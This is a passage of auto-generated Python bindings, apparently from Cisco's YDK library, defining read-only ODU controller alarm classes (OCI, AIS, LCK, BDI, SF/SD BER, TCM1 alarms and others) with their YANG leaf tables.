self.tcm6_ltc = Odu.Controllers.Controller.Info.Alarm.Tcm6Ltc()
self.tcm6_ltc.parent = self
self._children_name_map["tcm6_ltc"] = "tcm6-ltc"
self.tcm6_oci = Odu.Controllers.Controller.Info.Alarm.Tcm6Oci()
self.tcm6_oci.parent = self
self._children_name_map["tcm6_oci"] = "tcm6-oci"
self.tcm6_lck = Odu.Controllers.Controller.Info.Alarm.Tcm6Lck()
self.tcm6_lck.parent = self
self._children_name_map["tcm6_lck"] = "tcm6-lck"
self.tcm6_iae = Odu.Controllers.Controller.Info.Alarm.Tcm6Iae()
self.tcm6_iae.parent = self
self._children_name_map["tcm6_iae"] = "tcm6-iae"
self.tcm6_biae = Odu.Controllers.Controller.Info.Alarm.Tcm6Biae()
self.tcm6_biae.parent = self
self._children_name_map["tcm6_biae"] = "tcm6-biae"
self.tcm6_bdi = Odu.Controllers.Controller.Info.Alarm.Tcm6Bdi()
self.tcm6_bdi.parent = self
self._children_name_map["tcm6_bdi"] = "tcm6-bdi"
self.tcm6_tim = Odu.Controllers.Controller.Info.Alarm.Tcm6Tim()
self.tcm6_tim.parent = self
self._children_name_map["tcm6_tim"] = "tcm6-tim"
self.tcm6_sf_ber = Odu.Controllers.Controller.Info.Alarm.Tcm6SfBer()
self.tcm6_sf_ber.parent = self
self._children_name_map["tcm6_sf_ber"] = "tcm6-sf-ber"
self.tcm6_sd_ber = Odu.Controllers.Controller.Info.Alarm.Tcm6SdBer()
self.tcm6_sd_ber.parent = self
self._children_name_map["tcm6_sd_ber"] = "tcm6-sd-ber"
self.gfp_lfd = Odu.Controllers.Controller.Info.Alarm.GfpLfd()
self.gfp_lfd.parent = self
self._children_name_map["gfp_lfd"] = "gfp-lfd"
self.gfp_locs = Odu.Controllers.Controller.Info.Alarm.GfpLocs()
self.gfp_locs.parent = self
self._children_name_map["gfp_locs"] = "gfp-locs"
self.gfp_loccs = Odu.Controllers.Controller.Info.Alarm.GfpLoccs()
self.gfp_loccs.parent = self
self._children_name_map["gfp_loccs"] = "gfp-loccs"
self.gfp_upm = Odu.Controllers.Controller.Info.Alarm.GfpUpm()
self.gfp_upm.parent = self
self._children_name_map["gfp_upm"] = "gfp-upm"
self._segment_path = lambda: "alarm"
self._is_frozen = True
def __setattr__(self, name, value):
    # Route every attribute assignment through the YDK base helper. The
    # empty list means Alarm declares no leaf attributes of its own at this
    # level; the helper enforces the entity's frozen/validation rules.
    self._perform_setattr(Odu.Controllers.Controller.Info.Alarm, [], name, value)
class Oci(_Entity_):
    """
    Open Connection Indiction.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Oci, self).__init__()

        self.yang_name = "oci"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "oci"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Oci']['meta_info']
class Ais(_Entity_):
    """
    Alarm Indication Signal.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Ais, self).__init__()

        self.yang_name = "ais"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "ais"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Ais']['meta_info']
class Lck(_Entity_):
    """
    Upstream Connection Locked.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Lck, self).__init__()

        self.yang_name = "lck"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "lck"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Lck']['meta_info']
class Bdi(_Entity_):
    """
    Backward Defect Indication.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Bdi, self).__init__()

        self.yang_name = "bdi"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "bdi"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Bdi']['meta_info']
class Eoc(_Entity_):
    """
    GCC End of Channel.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Eoc, self).__init__()

        self.yang_name = "eoc"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "eoc"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Eoc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Eoc']['meta_info']
class Ptim(_Entity_):
    """
    Payload Type Identifier Mismatch.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Ptim, self).__init__()

        self.yang_name = "ptim"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "ptim"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Ptim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Ptim']['meta_info']
class Tim(_Entity_):
    """
    Trace Identifier Mismatch information.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Tim, self).__init__()

        self.yang_name = "tim"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tim"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tim']['meta_info']
class Iae(_Entity_):
    """
    Incoming Alignment Error.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Iae, self).__init__()

        self.yang_name = "iae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "iae"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Iae']['meta_info']
class Biae(_Entity_):
    """
    Backward Incoming Alignment Error.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Biae, self).__init__()

        self.yang_name = "biae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "biae"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Biae']['meta_info']
class SfBer(_Entity_):
    """
    SF BER alarm.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.SfBer, self).__init__()

        self.yang_name = "sf-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "sf-ber"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.SfBer']['meta_info']
class SdBer(_Entity_):
    """
    SD BER alarm.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.SdBer, self).__init__()

        self.yang_name = "sd-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "sd-ber"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.SdBer']['meta_info']
class Csf(_Entity_):
    """
    Client Signal Failure.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Csf, self).__init__()

        self.yang_name = "csf"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "csf"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Csf, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Csf']['meta_info']
class Tcm1Ais(_Entity_):
    """
    TCM1 Alarm Indication Signal.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Tcm1Ais, self).__init__()

        self.yang_name = "tcm1-ais"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm1-ais"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Ais']['meta_info']
class Tcm1Ltc(_Entity_):
    """
    TCM1 Loss of Tandem connection Monitoring.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc, self).__init__()

        self.yang_name = "tcm1-ltc"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm1-ltc"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc']['meta_info']
class Tcm1Oci(_Entity_):
    """
    TCM1 Open Connection Indiction.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Tcm1Oci, self).__init__()

        self.yang_name = "tcm1-oci"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm1-oci"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Oci']['meta_info']
class Tcm1Lck(_Entity_):
    """
    TCM1 Upstream Connection Locked.

    Read-only (config false) alarm state:
    reporting_enabled (bool) -- whether reporting of this alarm is enabled;
    is_detected (bool) -- whether the defect is currently detected;
    is_asserted (bool) -- whether the defect has been declared;
    counter (int, 0..18446744073709551615) -- alarm occurrence counter.
    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Explicit two-argument super() is valid on both Python 2 and 3.
        super(Odu.Controllers.Controller.Info.Alarm.Tcm1Lck, self).__init__()

        self.yang_name = "tcm1-lck"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf table: python attribute -> (YLeaf descriptor, accepted types).
        self._leafs = OrderedDict(
            (attr, (YLeaf(ytype, yang_leaf), [ptype]))
            for attr, ytype, yang_leaf, ptype in (
                ('reporting_enabled', YType.boolean, 'reporting-enabled', 'bool'),
                ('is_detected', YType.boolean, 'is-detected', 'bool'),
                ('is_asserted', YType.boolean, 'is-asserted', 'bool'),
                ('counter', YType.uint64, 'counter', 'int'),
            )
        )
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm1-lck"
        # Freeze only after every attribute above is in place.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm1Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm1Lck']['meta_info']
class Tcm1Iae(_Entity_):
    """
    TCM1 Incoming Alignment Error.

